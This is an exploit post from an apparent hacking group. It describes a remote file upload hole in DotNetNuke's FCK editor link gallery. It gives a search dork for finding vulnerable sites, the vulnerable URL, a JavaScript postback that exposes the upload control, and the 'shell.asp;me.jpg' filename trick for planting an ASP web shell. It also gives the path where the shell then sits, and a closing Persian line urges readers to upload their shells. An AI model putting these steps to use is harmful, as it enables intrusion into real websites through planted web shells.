************************************************** ****
** DotNetNuke Remote File upload Vulnerability
************************************************** **********
** Prodcut: DotNetNuke
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Remote File upload
** Risk : High
** Dork : inurl:tabid/176/Default.aspx or inurlortals/0/
************************************************** **********
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors : Ra3cH & Ma3sTr0-Dz
** From : Algeria
** Contact : [email protected]
** ************************************************** *******
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************** **********
** Exploit:
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')
**
**
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg
************************************************** **********
**
** you find your Shell Hier
**
** http://[PATH]/portals/0/dz4all.asp;me.jpg
__________________________________________________ __
خوب اینم از این شل هاتونو آپ کنید :25: